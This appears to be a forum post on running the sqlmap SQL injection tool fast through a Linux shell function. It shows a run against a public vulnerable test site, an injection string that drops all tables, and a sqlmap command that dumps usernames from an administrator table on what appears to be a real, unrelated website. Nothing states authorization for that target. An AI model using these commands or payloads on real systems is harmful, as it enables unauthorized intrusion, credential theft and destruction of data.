Sqlmap Super Fast Penetration Linux Function
Page 1 of 1 • Share •
Sqlmap Super Fast Penetration Linux Function
How 2 update
- Code:
cd /etc/
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap
New Example: (function)
- Code:
function sql(){
sqlmap --wizard --time-sec 10 -u $1 --dbs --tamper
}
Example
- Code:
sql http://testphp.vulnweb.com/listproducts.php?cat=1
How 2 use Sqlmap
Extra
- Code:
testphp.vulnweb.com/listproducts.php?cat=-1' or 68 = '66; DROP ALL TABLES; --
- Code:
sqlmap -u www.gba-corona.com/news.php?id=6 -D cif1 -T ADMINISTRATOR -C username --dump
More Info Foun @
kalitutorials.net/2014/03/hacking-website-with-sqlmap-in-kali.html
security.stackexchange.com/questions/33900/sql-injection-drop-all-tables

» Linux Based Stable Solution for VoIP Business!!
» Linux based VoIP Switch with Integrated Billing only $2/port
» How to install Selenium RC on Linux fedora
» Super Mario Mushroom Kingdom Warp Pipe Game
» New Super Mario Bros. 2 lag discussion
» Linux based VoIP Switch with Integrated Billing only $2/port
» How to install Selenium RC on Linux fedora
» Super Mario Mushroom Kingdom Warp Pipe Game
» New Super Mario Bros. 2 lag discussion
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum